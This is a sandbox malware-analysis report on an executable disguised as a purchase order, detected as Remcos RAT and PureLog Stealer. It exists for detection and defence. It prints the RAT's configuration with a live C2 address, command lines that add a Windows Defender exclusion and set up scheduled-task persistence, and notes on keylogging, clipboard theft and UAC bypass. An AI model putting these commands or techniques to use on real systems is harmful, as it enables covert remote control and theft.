Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Supplier Purchase Order - PO0002491.exe

Overview

General Information

Sample name:Supplier Purchase Order - PO0002491.exe
Analysis ID:1541115
MD5:9fe3811c49214479c36a4f4a35e9ca08
SHA1:eddbde04b9751295e209addc60de427c07b4cf1e
SHA256:3a15b2df43b3665b869280969adaec6fc18de92f2da83e1d0228d7379fd55e09
Tags:exeuser-threatcat_ch
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Supplier Purchase Order - PO0002491.exe (PID: 1868 cmdline: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe" MD5: 9FE3811C49214479C36A4F4A35E9CA08)
    • powershell.exe (PID: 3724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • keHuNxIumw.exe (PID: 1436 cmdline: C:\Users\user\AppData\Roaming\keHuNxIumw.exe MD5: 9FE3811C49214479C36A4F4A35E9CA08)
    • schtasks.exe (PID: 3748 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • keHuNxIumw.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Roaming\keHuNxIumw.exe" MD5: 9FE3811C49214479C36A4F4A35E9CA08)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.14:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GOFAGZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                12.2.keHuNxIumw.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  12.2.keHuNxIumw.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    12.2.keHuNxIumw.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      Click to see the 31 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", ProcessId: 3724, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", ProcessId: 3724, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\keHuNxIumw.exe, ParentImage: C:\Users\user\AppData\Roaming\keHuNxIumw.exe, ParentProcessId: 1436, ParentProcessName: keHuNxIumw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp", ProcessId: 3748, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", ProcessId: 4484, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", ProcessId: 3724, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", ProcessId: 4484, ProcessName: schtasks.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 1B 46 CC 3C 14 80 AB 02 C8 5E C9 68 00 90 CD 42 66 5F 9E 50 E2 23 AD 7C 95 78 E6 18 80 52 AB 3D 21 25 0F 52 47 CB 12 1F 4F 71 DE 8B B0 9B 51 4B 20 BF 5F 62 09 98 04 AF 23 AC F2 94 A9 11 0B F6 1F CC DA 7B EF C1 CD B5 ED BB 49 D2 D6 DC 02 35 38 12 D1 09 1B 75 09 4E F4 65 C2 71 03 9A D6 E4 86 1C A4 D9 22 6A 5D 31 77 53 A6 55 62 80 B8 0B 11 D9 A2 A6 A2 2B 55 25 48 DF 22 E6 3D 12 44 F4 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ProcessId: 5972, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-GOFAGZ\exepath

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T12:58:12.110788+020020327761Malware Command and Control Activity Detected192.168.2.549708192.210.150.142404TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T12:58:12.784600+020020327771Malware Command and Control Activity Detected192.210.150.142404192.168.2.549708TCP
                      2024-10-24T13:00:16.623458+020020327771Malware Command and Control Activity Detected192.210.150.142404192.168.2.549708TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T12:58:14.440169+020028033043Unknown Traffic192.168.2.549710178.237.33.5080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.14:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GOFAGZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeReversingLabs: Detection: 73%
                      Multi AV Scanner detection for submitted file
                      Source: Supplier Purchase Order - PO0002491.exeReversingLabs: Detection: 73%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Supplier Purchase Order - PO0002491.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_004338C8
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_58eed15b-8

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00407538 _wcslen,CoGetObject,12_2_00407538
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Supplier Purchase Order - PO0002491.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: ldPH.pdb source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr
                      Source: Binary string: ldPH.pdbSHA256 source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49708 -> 192.210.150.14:2404
                      Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.14:2404 -> 192.168.2.5:49708
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 192.210.150.14
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49710 -> 178.237.33.50:80
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B411
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, keHuNxIumw.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, keHuNxIumw.exe, 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                      Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2161767525.00000000033C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: keHuNxIumw.exe, 00000008.00000002.2241166985.0000000002B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP#
                      Source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000012_2_0040A2F3
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168FC
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A41B
                      Source: Yara matchFile source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
